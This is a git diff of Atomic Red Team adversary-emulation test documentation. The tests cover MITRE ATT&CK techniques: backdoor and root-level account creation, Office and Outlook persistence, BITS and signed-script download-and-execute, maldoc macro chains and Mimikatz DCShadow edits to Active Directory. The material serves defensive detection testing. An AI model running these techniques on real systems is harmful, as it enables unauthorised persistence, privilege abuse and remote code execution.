## Atomic Test #1 - Create a user account on a Linux system -Create a user via useradd +auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 + +Create a user via useradd **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of the user to create | String | evil_user| @@ -55,15 +57,17 @@ userdel #{username}
## Atomic Test #2 - Create a user account on a MacOS system -Creates a user on a MacOS system with dscl +auto_generated_guid: 01993ba5-1da3-4e15-a719-b690d4f0f0b2 + +Creates a user on a MacOS system with dscl **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of the user to create | String | evil_user| | realname | 'realname' to record when creating the user | String | Evil Account| @@ -94,16 +98,18 @@ dscl . -delete /Users/#{username}
## Atomic Test #3 - Create a new user in a command prompt + +auto_generated_guid: 6657864e-0323-4206-9344-ac9cd7265a4f + Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_CMD" - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of the user to create | String | T1136.001_CMD| | password | Password of the user to create | String | T1136.001_CMD!| @@ -129,16 +135,18 @@ net user /del "#{username}" >nul 2>&1
## Atomic Test #4 - Create a new user in PowerShell + +auto_generated_guid: bc8be0ac-475c-4fbf-9b1d-9fffd77afbde + Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_PowerShell" - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of the user to create | String | T1136.001_PowerShell| @@ -163,15 +171,17 @@ Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
## Atomic Test #5 - Create a new user in Linux with `root` UID and GID. -Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. +auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c + +Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of the user to create | String | butter| | password | Password of the user to create | String | BetterWithButter| @@ -198,15 +208,17 @@ userdel #{username}
## Atomic Test #6 - Create a new Windows admin user -Creates a new admin user in a command prompt. +auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 + +Creates a new admin user in a command prompt. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of the user to create | String | T1136.001_Admin| | password | Password of the user to create | String | T1136_pass| diff --git a/atomics/T1136.002/T1136.002.md b/atomics/T1136.002/T1136.002.md index cf70f9c5..698235a2 100644 --- a/atomics/T1136.002/T1136.002.md +++ b/atomics/T1136.002/T1136.002.md @@ -16,15 +16,17 @@ Such accounts may be used to establish secondary credentialed access that do not
## Atomic Test #1 - Create a new Windows domain admin user -Creates a new domain admin user in a command prompt. +auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 + +Creates a new domain admin user in a command prompt. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of the user to create | String | T1136.002_Admin| | password | Password of the user to create | String | T1136_pass123!| @@ -52,15 +54,17 @@ net user "#{username}" >nul 2>&1 /del /domain
## Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON -Create a new account similar to ANONYMOUS LOGON in a command prompt. +auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 + +Create a new account similar to ANONYMOUS LOGON in a command prompt. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of the user to create | String | ANONYMOUS LOGON| | password | Password of the user to create | String | T1136_pass123!| @@ -86,15 +90,17 @@ net user "#{username}" >nul 2>&1 /del /domain
## Atomic Test #3 - Create a new Domain Account using PowerShell -Creates a new Domain User using the credentials of the Current User +auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 + +Creates a new Domain User using the credentials of the Current User **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Name of the Account to be created | String | T1136.002_Admin| | password | Password of the Account to be created | String | T1136_pass123!| diff --git a/atomics/T1137.002/T1137.002.md b/atomics/T1137.002/T1137.002.md index 48f9de53..1fee5136 100644 --- a/atomics/T1137.002/T1137.002.md +++ b/atomics/T1137.002/T1137.002.md @@ -17,16 +17,18 @@ Adversaries may add this Registry key and specify a malicious DLL that will be e
## Atomic Test #1 - Office Application Startup Test Persistence + +auto_generated_guid: c3e35b58-fe1c-480b-b540-7600fb612563 + Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. Key is used for debugging purposes. Not created by default & exist in HKCU & HKLM hives. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll| diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md index 858ef875..c7058537 100644 --- a/atomics/T1137.004/T1137.004.md +++ b/atomics/T1137.004/T1137.004.md @@ -13,17 +13,19 @@ Once malicious home pages have been added to the user’s mailbox, they will be
## Atomic Test #1 - Install Outlook Home Page Persistence + +auto_generated_guid: 7a91ad51-e6d2-4d43-9471-f26362f5738e + This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) | string | file://PathToAtomicsFolder\T1137.004\src\T1137.004.html| | outlook_version | Version of Outlook that is installed | string | 16.0| diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md index 50c9c974..b8b4f65b 100644 --- a/atomics/T1137/T1137.md +++ b/atomics/T1137/T1137.md @@ -12,12 +12,14 @@ A variety of features have been discovered in Outlook that can be abused to obta
## Atomic Test #1 - Office Application Startup - Outlook as a C2 + +auto_generated_guid: bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c + As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands. This transform Outlook into a C2. Too achieve this two things must happened on the syste - The macro security registry value must be set to '4' - A file called VbaProject.OTM must be created in the Outlook Folder. - **Supported Platforms:** Windows diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md index 71607740..fc670d0d 100644 --- a/atomics/T1140/T1140.md +++ b/atomics/T1140/T1140.md @@ -16,16 +16,18 @@ Sometimes a user's action may be required to open it for deobfuscation or decryp
## Atomic Test #1 - Deobfuscate/Decode Files Or Information + +auto_generated_guid: dc6fe391-69e6-4506-bd06-ea5eeb4082f8 + Encode/Decode executable Upon execution a file named T1140_calc_decoded.exe will be placed in the temp folder - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable | name of executable | path | C:\Windows\System32\calc.exe| @@ -52,15 +54,17 @@ del %temp%\T1140_calc_decoded.exe >nul 2>&1
## Atomic Test #2 - Certutil Rename and Decode -Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) +auto_generated_guid: 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 + +Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable | name of executable/file to decode | path | C:\Windows\System32\calc.exe| diff --git a/atomics/T1176/T1176.md b/atomics/T1176/T1176.md index 087753e7..a5a461b2 100644 --- a/atomics/T1176/T1176.md +++ b/atomics/T1176/T1176.md @@ -24,8 +24,10 @@ There have also been instances of botnets using a persistent backdoor through ma
## Atomic Test #1 - Chrome (Developer Mode) -Turn on Chrome developer mode and Load Extension found in the src directory +auto_generated_guid: 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 + +Turn on Chrome developer mode and Load Extension found in the src directory **Supported Platforms:** Linux, Windows, macOS @@ -50,8 +52,10 @@ tick 'Developer Mode'.
## Atomic Test #2 - Chrome (Chrome Web Store) -Install the "Minimum Viable Malicious Extension" Chrome extension +auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f + +Install the "Minimum Viable Malicious Extension" Chrome extension **Supported Platforms:** Linux, Windows, macOS @@ -73,8 +77,10 @@ in Chrome
## Atomic Test #3 - Firefox -Create a file called test.wma, with the duration of 30 seconds +auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 + +Create a file called test.wma, with the duration of 30 seconds **Supported Platforms:** Linux, Windows, macOS @@ -98,8 +104,10 @@ click "Load Temporary Add-on"
## Atomic Test #4 - Edge Chromium Addon - VPN -Adversaries may use VPN extensions in an attempt to hide traffic sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. +auto_generated_guid: 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 + +Adversaries may use VPN extensions in an attempt to hide traffic sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. **Supported Platforms:** Windows, macOS diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md index d0b70b42..55789fa2 100644 --- a/atomics/T1197/T1197.md +++ b/atomics/T1197/T1197.md @@ -22,16 +22,18 @@ BITS upload functionalities can also be used to perform [Exfiltration Over Alter
## Atomic Test #1 - Bitsadmin Download (cmd) + +auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421 + This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md| | local_file | Local file path to save downloaded file | path | %temp%\bitsadmin1_flag.ps1| @@ -57,18 +59,20 @@ del #{local_file} >nul 2>&1
## Atomic Test #2 - Bitsadmin Download (PowerShell) + +auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc + This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload leveraging PowerShell Upon execution you will find a github markdown file downloaded to the Temp directory - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md| | local_file | Local file path to save downloaded file | path | $env:TEMP\bitsadmin2_flag.ps1| @@ -94,18 +98,20 @@ Remove-Item #{local_file} -ErrorAction Ignore
## Atomic Test #3 - Persist, Download, & Execute + +auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae + This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps. Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable. This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS" This job will remain in the BITS queue until complete or for up to 90 days by default if not removed. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_path | Path of command to execute | path | C:\Windows\system32\notepad.exe| | bits_job_name | Name of BITS job | string | AtomicBITS| @@ -138,18 +144,20 @@ del #{local_file} >nul 2>&1
## Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd) + +auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 + This test simulates using desktopimgdownldr.exe to download a malicious file instead of a desktop or lockscreen background img. The process that actually makes the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md| | download_path | Local file path to save downloaded file | path | SYSTEMROOT=C:\Windows\Temp| diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md index f81368ed..9ed98eb9 100644 --- a/atomics/T1201/T1201.md +++ b/atomics/T1201/T1201.md @@ -24,8 +24,10 @@ Password policies can be set and discovered on Windows, Linux, and macOS systems
## Atomic Test #1 - Examine password complexity policy - Ubuntu -Lists the password complexity policy to console on Ubuntu Linux. +auto_generated_guid: 085fe567-ac84-47c7-ac4c-2688ce28265b + +Lists the password complexity policy to console on Ubuntu Linux. **Supported Platforms:** Linux @@ -48,8 +50,10 @@ cat /etc/pam.d/common-password
## Atomic Test #2 - Examine password complexity policy - CentOS/RHEL 7.x -Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. +auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d + +Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. **Supported Platforms:** Linux @@ -70,7 +74,7 @@ cat /etc/security/pwquality.conf ##### Description: System must be CentOS or RHEL v7 ##### Check Prereq Commands: ```bash -if [ $(rpm -q --queryformat '%{VERSION}') -eq "7" ]; then exit /b 0; else exit /b 1; fi; +if [ $(rpm -q --queryformat '%{VERSION}') -eq "7" ]; then exit /b 0; else exit /b 1; fi; ``` ##### Get Prereq Commands: ```bash @@ -84,8 +88,10 @@ echo Please run from CentOS or RHEL v7
## Atomic Test #3 - Examine password complexity policy - CentOS/RHEL 6.x -Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. +auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358 + +Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. **Supported Platforms:** Linux @@ -107,7 +113,7 @@ cat /etc/security/pwquality.conf ##### Description: System must be CentOS or RHEL v6 ##### Check Prereq Commands: ```bash -if [ $(rpm -q --queryformat '%{VERSION}') -eq "6" ]; then exit /b 0; else exit /b 1; fi; +if [ $(rpm -q --queryformat '%{VERSION}') -eq "6" ]; then exit /b 0; else exit /b 1; fi; ``` ##### Get Prereq Commands: ```bash @@ -121,8 +127,10 @@ echo Please run from CentOS or RHEL v6
## Atomic Test #4 - Examine password expiration policy - All Linux -Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. +auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a + +Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. **Supported Platforms:** Linux @@ -145,8 +153,10 @@ cat /etc/login.defs
## Atomic Test #5 - Examine local password policy - Windows -Lists the local password policy to console on Windows. +auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6 + +Lists the local password policy to console on Windows. **Supported Platforms:** Windows @@ -169,8 +179,10 @@ net accounts
## Atomic Test #6 - Examine domain password policy - Windows -Lists the domain password policy to console on Windows. +auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4 + +Lists the domain password policy to console on Windows. **Supported Platforms:** Windows @@ -193,8 +205,10 @@ net accounts /domain
## Atomic Test #7 - Examine password policy - macOS -Lists the password policy to console on macOS. +auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742 + +Lists the password policy to console on macOS. **Supported Platforms:** macOS diff --git a/atomics/T1202/T1202.md b/atomics/T1202/T1202.md index 4aab2fdb..3c32944b 100644 --- a/atomics/T1202/T1202.md +++ b/atomics/T1202/T1202.md @@ -16,17 +16,19 @@ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.
## Atomic Test #1 - Indirect Command Execution - pcalua.exe + +auto_generated_guid: cecfea7a-5f03-4cdd-8bc8-6f7c22862440 + The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface. [Reference](https://twitter.com/KyleHanslovan/status/912659279806640128) Upon execution, calc.exe should open - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | payload_path | Path to payload | path | C:\Windows\System32\calc.exe| | process | Process to execute | string | calc.exe| @@ -49,18 +51,20 @@ pcalua.exe -a #{payload_path}
## Atomic Test #2 - Indirect Command Execution - forfiles.exe + +auto_generated_guid: 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc + forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface. [Reference](https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Forfiles.md) "This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe" Upon execution calc.exe will be opened - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | process | Process to execute | string | calc.exe| @@ -82,17 +86,19 @@ forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe
## Atomic Test #3 - Indirect Command Execution - conhost.exe + +auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29 + conhost.exe refers to a host process for the console window. It provide an interface between command prompt and Windows explorer. Executing it through command line can create process ancestry anomalies [Reference] (http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | process | Process to execute | string | notepad.exe| diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md index fdd9a4c2..e5bc2484 100644 --- a/atomics/T1204.002/T1204.002.md +++ b/atomics/T1204.002/T1204.002.md @@ -28,19 +28,21 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
## Atomic Test #1 - OSTap Style Macro Execution + +auto_generated_guid: 8bebc690-18c7-4549-bc98-210f7019efff + This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns. References: https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | jse_path | Path for the macro to write out the "malicious" .jse file | String | C:\Users\Public\art.jse| | ms_product | Maldoc application Word or Excel | String | Word| @@ -72,7 +74,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -86,15 +88,17 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #2 - OSTap Payload Download -Uses cscript //E:jscript to download a file +auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80 + +Uses cscript //E:jscript to download a file **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js| | file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt| @@ -121,16 +125,18 @@ del #{script_file} /F /Q >nul 2>&1
## Atomic Test #3 - Maldoc choice flags command execution + +auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18 + This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched. Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | ms_product | Maldoc application Word or Excel | String | Word| @@ -157,7 +163,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -171,16 +177,18 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #4 - OSTAP JS version + +auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911 + Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | jse_path | jse file to execute with wscript | Path | C:\Users\Public\art.jse| | ms_product | Maldoc application Word or Excel | String | Word| @@ -208,7 +216,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -222,15 +230,17 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #5 - Office launching .bat file from AppData -Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. +auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa + +Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | bat_path | Path to malicious .bat file | String | $("$env:temp\art1204.bat")| | ms_product | Maldoc application Word or Excel | String | Word| @@ -258,7 +268,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -272,20 +282,22 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #6 - Excel 4 Macro + +auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 + This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious" VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec. A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated with Excel matches that of the local system. This username can be found under Files -> Options -> Username - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | download_url | Download URL | String | https://live.sysinternals.com/procexp.exe| | uname | Username for pathing | String | $env:Username| @@ -366,7 +378,7 @@ try { New-Object -COMObject "Excel.Application" | Out-Null Stop-Process -Name "Excel" exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -380,10 +392,12 @@ Write-Host "You will need to install Microsoft Excel manually to meet this requi
## Atomic Test #7 - Headless Chrome code execution via VBA + +auto_generated_guid: a19ee671-ed98-4e9d-b19c-d1954a51585a + This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver and pull down the script and execute it. By default the payload will execute calc.exe on the system. - **Supported Platforms:** Windows @@ -409,7 +423,7 @@ Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode try { $wdApp = New-Object -COMObject "Word.Application" Stop-Process -Name "winword" - exit 0 } catch { exit 1 } + exit 0 } catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -421,7 +435,7 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir try { $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -435,15 +449,17 @@ Write-Host "You will need to install Google Chrome manually to meet this require
## Atomic Test #8 - Potentially Unwanted Applications (PUA) -The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). +auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 + +The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | pua_url | url to PotentiallyUnwanted.exe | url | http://amtso.eicar.org/PotentiallyUnwanted.exe| | pua_file | path to PotentiallyUnwanted.exe | Path | $env:TEMP/PotentiallyUnwanted.exe| diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md index f34d481e..8c22bc80 100644 --- a/atomics/T1207/T1207.md +++ b/atomics/T1207/T1207.md @@ -14,6 +14,9 @@ This technique may bypass system logging and security monitors such as security
## Atomic Test #1 - DCShadow - Mimikatz + +auto_generated_guid: 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 + Use Mimikatz DCShadow method to simulate behavior of a Domain Controller and edit protected attribute. [DCShadow](https://www.dcshadow.com/) @@ -24,14 +27,13 @@ Get-ADObject -LDAPFilter '(samaccountname=)' -Properties badpwdcount | sel Need SYSTEM privileges locally (automatically obtained via PsExec, so running as admin is sufficient), and Domain Admin remotely. The easiest is to run elevated and as a Domain Admin user. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | object | Targeted object (for machine account do not forget to add final '$') | string | bruce.wayne| | attribute | Object attribute to edit, interesting ones: badpwdcount, primaryGroupId, SIDHistory... | string | badpwdcount| @@ -79,7 +81,7 @@ Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore ##### Check Prereq Commands: ```powershell $mimikatz_path = cmd /c echo #{mimikatz_path} -if (Test-Path $mimikatz_path) {exit 0} else {exit 1} +if (Test-Path $mimikatz_path) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -92,7 +94,7 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} +if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1216.001/T1216.001.md b/atomics/T1216.001/T1216.001.md index 629309d6..66a7732e 100644 --- a/atomics/T1216.001/T1216.001.md +++ b/atomics/T1216.001/T1216.001.md @@ -12,15 +12,17 @@
## Atomic Test #1 - PubPrn.vbs Signed Script Bypass -Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. +auto_generated_guid: 9dd29a1f-1e16-4862-be83-913b10a88f6c + +Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_payload | A remote payload to execute using PubPrn.vbs. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct| diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md index d14d2c8b..c73cfd7b 100644 --- a/atomics/T1216/T1216.md +++ b/atomics/T1216/T1216.md @@ -12,16 +12,18 @@
## Atomic Test #1 - SyncAppvPublishingServer Signed Script PowerShell Command Execution + +auto_generated_guid: 275d963d-3f36-476c-8bef-a2a3960ee6eb + Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command. Upon execution, calc.exe will be launched. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_execute | A PowerShell command to execute. | string | Start-Process calc| @@ -42,15 +44,17 @@ C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
